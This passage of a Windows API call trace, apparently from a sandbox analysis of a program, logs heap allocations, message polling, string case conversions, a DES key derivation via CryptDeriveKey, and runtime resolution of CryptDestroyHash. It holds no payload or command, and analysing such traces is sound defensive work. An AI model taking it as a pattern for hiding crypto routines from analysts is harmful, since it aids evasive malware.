(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0201.135] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0201.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.135] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.135] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.135] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.135] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.135] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.136] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.136] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0201.136] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.136] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0201.136] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.136] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0201.136] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.136] CryptDeriveKey (in: hProv=0xad63f8, Algid=0x6601, hBaseData=0xaa5660, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5960) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0201.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.137] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0201.138] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0201.139] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0201.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.140] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0201.140] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.140] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0201.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0201.141] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0201.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.141] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.142] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.142] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.142] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0201.143] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.144] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0201.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0201.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0201.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0201.145] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0201.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0201.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0201.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0201.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.146] CryptDestroyHash (hHash=0xaa5660) returned 1 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0201.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0201.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0201.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0201.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0201.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0201.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0201.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0201.148] HeapFree (in: 